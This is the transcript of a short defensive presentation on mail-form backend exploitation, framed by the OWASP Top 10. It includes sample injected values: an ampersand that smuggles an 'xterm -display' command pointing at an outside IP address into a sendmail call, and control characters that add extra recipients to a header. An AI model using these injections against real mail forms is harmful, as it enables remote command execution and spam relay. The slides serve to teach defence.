Presentation is loading. Please wait.

Presentation is loading. Please wait.

Avoiding Backend Exploitation of Mail Forms Max Kessler, LPIC-1.

Published byFerdinand Sharp Modified over 8 years ago

Similar presentations

Presentation on theme: "Avoiding Backend Exploitation of Mail Forms Max Kessler, LPIC-1."— Presentation transcript:

1 Avoiding Backend Exploitation of Mail Forms Max Kessler, LPIC-1

2 OWASP Top 10 List ● #1 Unvalidated user input ● #2 Broken access control (sort of) ● #6 Injection flaws

3 How do mail forms work? ● A user types in their name, address and a message. ● Their data are sent to the web server in an HTTP request. ● The server runs a script that formats the text for consumption by a mail server, then feeds it to the mail server.

4 User input on the command line Exploit 1: insert semicolon/ampersand The command should be: /bin/sh /usr/sbin/sendmail -f max@example.com \ user1@example.com The command is: /bin/sh /usr/sbin/sendmail -f max@example.com& \ xterm -display 192.168.0.201:0&echo \ user1@example.com

5 Replay with control characters Exploit 2: insert control characters E-mail address should be: max@example.com E-mail address is: max@example.com To: user2@example.com, user3@example.com

6 Starting a new message Exploit 3: using '.' to start a new message SMTP servers allow multiple messages to be sent through a single connection. A new message is started by putting a '.' on a line by itself.

Download ppt "Avoiding Backend Exploitation of Mail Forms Max Kessler, LPIC-1."

Similar presentations

Webgoat.

Webgoat.
Review for Vocabulary Section 3 Quiz. What is the amount of data that can be sent in a certain amount of time? What is the amount of data that can be.

Review for Vocabulary Section 3 Quiz. What is the amount of data that can be sent in a certain amount of time? What is the amount of data that can be.
Preventing Web Application Injections with Complementary Character Coding Raymond Mui Phyllis Frankl Polytechnic Institute of NYU Presented at ESORICS.

Preventing Web Application Injections with Complementary Character Coding Raymond Mui Phyllis Frankl Polytechnic Institute of NYU Presented at ESORICS.
Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.

Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.
HTTP Cookies. CPSC 441 - Application Layer 2 User-server state: cookies Many major Web sites use cookies Four components: 1) cookie header line of HTTP.

HTTP Cookies. CPSC Application Layer 2 User-server state: cookies Many major Web sites use cookies Four components: 1) cookie header line of HTTP.
Communication Protocols II Ninth Meeting. TCP/IP family.

Communication Protocols II Ninth Meeting. TCP/IP family.
VoiceBlue Enterprise SMS over SMTP/POP3. Jak to funguje?

VoiceBlue Enterprise SMS over SMTP/POP3. Jak to funguje?
Browsers and Servers CGI Processing Model ( Common Gateway Interface ) © Norman White, 2013.

Browsers and Servers CGI Processing Model ( Common Gateway Interface ) © Norman White, 2013.
The Internet Useful Definitions and Concepts About the Internet.

The Internet Useful Definitions and Concepts About the Internet.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Web Application Security An Introduction. OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management.

Web Application Security An Introduction. OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management.
Implementing Application Protocols. Overview An application protocol facilitates communication between applications. For example, an email client uses.

Implementing Application Protocols. Overview An application protocol facilitates communication between applications. For example, an client uses.
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.

Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
Boris Tshibangu. What is a proxy server? A proxy server is a server (a computer system or an application) that acts as an intermediary for requests from.

Boris Tshibangu. What is a proxy server? A proxy server is a server (a computer system or an application) that acts as an intermediary for requests from.
TCP Sockets Reliable Communication. TCP As mentioned before, TCP sits on top of other layers (IP, hardware) and implements Reliability In-order delivery.

TCP Sockets Reliable Communication. TCP As mentioned before, TCP sits on top of other layers (IP, hardware) and implements Reliability In-order delivery.
INTRODUCTION TO WEB DATABASE PROGRAMMING

INTRODUCTION TO WEB DATABASE PROGRAMMING
PHP Tutorials 02 Olarik Surinta Management Information System Faculty of Informatics.

PHP Tutorials 02 Olarik Surinta Management Information System Faculty of Informatics.
FTP (File Transfer Protocol) & Telnet

FTP (File Transfer Protocol) & Telnet
Student Learning Environment on the World Wide Web l CGI-programming in Perl for the connection of databases over the Internet. l Web authoring using Frontpage.

Student Learning Environment on the World Wide Web l CGI-programming in Perl for the connection of databases over the Internet. l Web authoring using Frontpage.

Similar presentations

Ads by Google